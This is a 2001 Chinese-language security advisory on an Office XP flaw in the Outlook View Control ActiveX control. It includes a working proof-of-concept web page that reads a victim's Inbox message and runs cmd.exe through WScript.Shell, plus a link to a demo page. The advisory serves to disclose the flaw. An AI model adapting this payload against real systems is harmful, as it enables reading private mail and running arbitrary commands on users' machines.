MS Office XP 执行攻击者代码漏洞

/ns/ld/win/data/20010714044517.htm

涉及程序:
MS Office XP

描述:
MS Office XP 存在执行攻击者任意代码的危险

详细:
如果用户用 IE 浏览一个特殊构造的 HTML 页面,用 Outlook XP 打开或预览一个信息,则会存在未知代码在自己的机器上执行的可能,甚至会导致攻击者完全控制用户机器。

问题在于 Office XP 安装了一个 ActiveX 控件 "Microsoft Outlook View Control",该控件会使用 Outlook "Application" 对象,从而导致任意代码执行的危险。


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


-----------------------------------------------------
This assumes you have at least one message in Outlook XP's Inbox
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>


<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();


vv2=vv1.Session.Application.CreateObject("WScript.Shell");


alert("Much more fun is possible");



vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");


}
setTimeout("f()",2000);
</script>
-----------------------------------------------------

感兴趣读者可到下面地址观看演示:
http://www.20cn.net/temp/officexp_demo.html
(适用于windows安装于C:盘)

受影响系统:
Win2K + IE 5.5 SP1 fully patched + Office XP

解决方案:
微软尚未作出反应